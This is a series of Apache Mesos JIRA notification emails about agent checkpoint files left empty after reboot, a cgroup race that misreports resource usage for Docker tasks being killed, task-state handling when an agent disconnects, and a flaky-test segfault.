Modify: 2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - {noformat} And since there was no fsync before reboot, all checkpoints resulted in empty files: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 33967500Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:15:41.485506070 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 33967495Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 23:00:42.190975780 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 67306255Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:12:25.751463030 + Modify: 
2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - {noformat} So were {{forked.pid}} and {{task.info}}. As a result, the agent failed to recover after reboot: {noformat} E0123 17:15:41.00 2709 slave.cpp:6800] EXIT with status 1: Failed to perform recovery: Failed to recover framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from
[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336700#comment-16336700 ] Jie Yu commented on MESOS-8480: --- I checked the kernel code, looks like when a process exits (or killed), but hasn't been reaped yet (zombie), the proc file `/proc//cgroup` will still exist, but the cgroup of the task will be set to root cgroup: [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5194] [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n1003] [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/exit.c?h=v4.1.49#n757] [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5357] > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes a racy call to > 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced by [^test.cpp] with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... > Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
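The failure mode above can be sketched outside of Mesos. Below is a minimal Python illustration (hypothetical helper names; not Mesos code, which does this in C++): extract the `cpuacct` cgroup from a `/proc/<pid>/cgroup` line, and note how the root cgroup `/` reported for a dying container turns the constructed path into the root hierarchy's `cpuacct.stat`.

```python
def cpuacct_cgroup(proc_cgroup_text):
    # Each line looks like "<id>:<subsystems>:<cgroup>",
    # e.g. "9:cpuacct,cpu:/docker/66fbe67b...".
    for line in proc_cgroup_text.splitlines():
        _, subsystems, cgroup = line.split(":", 2)
        if "cpuacct" in subsystems.split(","):
            return cgroup
    return None

def stat_path(cgroup):
    # Mirrors the naive concatenation that yields "cpuacct///cpuacct.stat"
    # when the process has been moved to the root cgroup ("/").
    return "/sys/fs/cgroup/cpuacct/" + cgroup + "/cpuacct.stat"

running = "9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b"
dying = "9:cpuacct,cpu:/"  # process moved to the root cgroup during teardown

print(stat_path(cpuacct_cgroup(dying)))  # /sys/fs/cgroup/cpuacct///cpuacct.stat
```

The triple slash is harmless to the kernel, which is why the read silently succeeds and returns root-cgroup statistics instead of failing.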
[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.
[ https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Mahler updated MESOS-7911: --- Description: Currently, when a framework with checkpointing disabled has tasks running on an agent and that agent disconnects from the master, the master will mark those tasks LOST and remove them from its memory. The assumption is that the agent is disconnecting because it terminated. However, it's possible that this disconnection occurred due to a transient loss of connectivity and the agent re-connects while never having terminated. This case violates our assumption of there being no tasks unknown to the master: ``` void Master::reconcileKnownSlave( Slave* slave, const vector& executors, const vector& tasks) { ... // TODO(bmahler): There's an implicit assumption here the slave // cannot have tasks unknown to the master. This _should_ be the // case since the causal relationship is: // slave removes task -> master removes task // Add error logging for any violations of this assumption! ``` As a result, the tasks would remain on the agent but the master would not know about them! A more appropriate action here would be: # When an agent disconnects, mark the tasks as unreachable. ## If the framework is not partition aware, only show it the last known task state. ## If the framework is partition aware, let it know that the tasks are now unreachable. # If the agent re-connects: ## If the agent had restarted, let the non-checkpointing framework know its tasks are GONE/LOST. ## If the agent still holds the tasks, the tasks are restored as reachable. # If the agent gets removed: ## For partition-aware non-checkpointing frameworks, let them know the tasks are unreachable. ## For non-partition-aware non-checkpointing frameworks, let them know the tasks are lost, and kill the tasks if the agent comes back. 
was: Currently, when framework with checkpointing disabled has tasks running on an agent and that agent disconnects from the master, the master will mark those tasks LOST and remove them from its memory. The assumption is that the agent is disconnecting because it terminated. However, it's possible that this disconnection occurred due to a transient loss of connectivity and the agent re-connects while never having terminated. This case violates our assumption of there being no unknown tasks to the master: ``` void Master::reconcileKnownSlave( Slave* slave, const vector& executors, const vector& tasks) { ... // TODO(bmahler): There's an implicit assumption here the slave // cannot have tasks unknown to the master. This _should_ be the // case since the causal relationship is: // slave removes task -> master removes task // Add error logging for any violations of this assumption! ``` As a result, the tasks would remain on the agent but the master would not know about them! A more appropriate action here would be: (1) When an agent disconnects, mark the tasks as unreachable. (a) If the framework is not partition aware, only show it the last known task state. (b) If the framework is partition aware, let it know that it's now unreachable. (2) If the agent re-connects: (a) And the agent had restarted, let the non-checkpointing framework know its tasks are GONE/LOST. (b) If the agent still holds the tasks, the tasks are restored as reachable. (3) If the agent gets removed: (a) For partition aware non-checkpointing frameworks, let them know the tasks are unreachable. (b) For non partition aware non-checkpointing frameworks, let them know the tasks are lost and kill them if the agent comes back. > Non-checkpointing framework's tasks should not be marked LOST when agent > disconnects. 
> - > > Key: MESOS-7911 > URL: https://issues.apache.org/jira/browse/MESOS-7911 > Project: Mesos > Issue Type: Bug >Reporter: Benjamin Mahler >Priority: Critical > Labels: reliability > > Currently, when framework with checkpointing disabled has tasks running on an > agent and that agent disconnects from the master, the master will mark those > tasks LOST and remove them from its memory. The assumption is that the agent > is disconnecting because it terminated. > However, it's possible that this disconnection occurred due to a transient > loss of connectivity and the agent re-connects while never having terminated. > This case violates our assumption of there being no unknown tasks to the > master: > ``` > void Master::reconcileKnownSlave( > Slave* slave, > const vector& executors, > const vector& tasks) > { > ... > // TODO(bmahler): There's an implicit assumption here the slave > // cannot have tasks unknown to the master. This _should_ be the > // case since the causal relationship
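The proposed handling above can be summarized as a small decision function. The sketch below (hypothetical event names and state strings; not a Mesos API) maps the three agent events from the description to what a non-checkpointing framework would observe, split by partition awareness.

```python
def observed_task_state(event, partition_aware):
    """What a non-checkpointing framework sees for its tasks (sketch)."""
    if event == "agent_disconnected":
        # Tasks become unreachable; a non-partition-aware framework is
        # only shown the last known task state.
        return "TASK_UNREACHABLE" if partition_aware else "last known state"
    if event == "agent_reconnected_after_restart":
        # The agent restarted, so the tasks are gone.
        return "TASK_GONE" if partition_aware else "TASK_LOST"
    if event == "agent_reconnected_tasks_intact":
        # The agent still holds the tasks; they are restored as reachable.
        return "restored as reachable"
    if event == "agent_removed":
        # Non-partition-aware frameworks see LOST, and the tasks are
        # killed if the agent comes back.
        return "TASK_UNREACHABLE" if partition_aware else "TASK_LOST"
    raise ValueError(f"unknown event: {event}")

print(observed_task_state("agent_disconnected", partition_aware=True))
```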
[jira] [Updated] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.
[ https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Mahler updated MESOS-8453: --- Sprint: Mesosphere Sprint 73 > ExecutorAuthorizationTest.RunTaskGroup segfaults. > - > > Key: MESOS-8453 > URL: https://issues.apache.org/jira/browse/MESOS-8453 > Project: Mesos > Issue Type: Bug > Components: test >Affects Versions: 1.5.0 > Environment: Ubuntu 14.04 with SSL. >Reporter: Alexander Rukletsov >Assignee: Benjamin Mahler >Priority: Major > Labels: flaky-test > Attachments: RunTaskGroup-badrun.txt > > > {noformat} > 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if > you are using GNU date *** > 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID > 0x7f36e2722700) from PID 18446744072769538424; stack trace: *** > 14:32:50 @ 0x7f36dcc763fd (unknown) > 14:32:50 @ 0x7f36dcc7b419 (unknown) > 14:32:50 @ 0x7f36dcc6f918 (unknown) > 14:32:50 @ 0x7f36eb99e330 (unknown) > 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 @ 0x7f36ef12bd22 > _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_ > 14:32:50 @ 0x7f36ef12c834 > _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv > 14:32:50 @ 0x7f36ee1c1e8a > _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_ > 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume() > 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume() > 
14:32:50 @ 0x7f36ef134216 > _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv > 14:32:50 @ 0x7f36ec15a5b0 (unknown) > 14:32:50 @ 0x7f36eb996184 start_thread > 14:32:50 @ 0x7f36eb6c2ffd (unknown) > {noformat} > Full log attached. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.
[ https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Mahler reassigned MESOS-8453: -- Assignee: Benjamin Mahler > ExecutorAuthorizationTest.RunTaskGroup segfaults. > - > > Key: MESOS-8453 > URL: https://issues.apache.org/jira/browse/MESOS-8453 > Project: Mesos > Issue Type: Bug > Components: test >Affects Versions: 1.5.0 > Environment: Ubuntu 14.04 with SSL. >Reporter: Alexander Rukletsov >Assignee: Benjamin Mahler >Priority: Major > Labels: flaky-test > Attachments: RunTaskGroup-badrun.txt > > > {noformat} > 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if > you are using GNU date *** > 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID > 0x7f36e2722700) from PID 18446744072769538424; stack trace: *** > 14:32:50 @ 0x7f36dcc763fd (unknown) > 14:32:50 @ 0x7f36dcc7b419 (unknown) > 14:32:50 @ 0x7f36dcc6f918 (unknown) > 14:32:50 @ 0x7f36eb99e330 (unknown) > 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 @ 0x7f36ef12bd22 > _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_ > 14:32:50 @ 0x7f36ef12c834 > _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv > 14:32:50 @ 0x7f36ee1c1e8a > _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_ > 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume() > 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume() > 
14:32:50 @ 0x7f36ef134216 > _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv > 14:32:50 @ 0x7f36ec15a5b0 (unknown) > 14:32:50 @ 0x7f36eb996184 start_thread > 14:32:50 @ 0x7f36eb6c2ffd (unknown) > {noformat} > Full log attached. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8479) Document agent SIGUSR1 behavior.
[ https://issues.apache.org/jira/browse/MESOS-8479?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] James Peach updated MESOS-8479: --- Summary: Document agent SIGUSR1 behavior. (was: Document agne SIGUSR1 behavior.) > Document agent SIGUSR1 behavior. > > > Key: MESOS-8479 > URL: https://issues.apache.org/jira/browse/MESOS-8479 > Project: Mesos > Issue Type: Bug > Components: agent, documentation >Reporter: James Peach >Priority: Major > > The agent enters shutdown when it receives {{SIGUSR1}}. We should document > what this means, the corresponding behavior and how operators are intended to > use this. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
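For reference while writing that documentation, the signal delivery itself is easy to demonstrate. The Python sketch below registers a stand-in handler and sends its own process {{SIGUSR1}}; the real agent initiates its shutdown sequence instead of recording the signal, so this is only an illustration, not agent code.

```python
import os
import signal

received = []

def on_usr1(signum, frame):
    # Stand-in for the agent's SIGUSR1 shutdown path.
    received.append(signum)

signal.signal(signal.SIGUSR1, on_usr1)

# Deliver SIGUSR1 to ourselves, as an operator would with `kill -USR1 <pid>`.
os.kill(os.getpid(), signal.SIGUSR1)

print(received == [signal.SIGUSR1])  # True
```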
[jira] [Comment Edited] (MESOS-8184) Implement master's AcknowledgeOfferOperationMessage handler.
[ https://issues.apache.org/jira/browse/MESOS-8184?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16291303#comment-16291303 ] Gastón Kleiman edited comment on MESOS-8184 at 1/23/18 10:18 PM: - [https://reviews.apache.org/r/65300/] [https://reviews.apache.org/r/64618/] was (Author: gkleiman): https://reviews.apache.org/r/64618/ > Implement master's AcknowledgeOfferOperationMessage handler. > > > Key: MESOS-8184 > URL: https://issues.apache.org/jira/browse/MESOS-8184 > Project: Mesos > Issue Type: Task >Reporter: Gastón Kleiman >Assignee: Gastón Kleiman >Priority: Major > Labels: mesosphere > > This handler should validate the message and forward it to the corresponding > agent/ERP. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Story Points: 2 (was: 3) > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes a racy call to > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced by [^test.cpp] with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... 
> Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Description: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being torn down, it seems that Docker or the operating system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes a racy call to [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... 
Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} was: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... 
Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read >
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Description: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being torn down, it seems that Docker or the operating system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... 
Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} was: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced through test.cpp with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... 
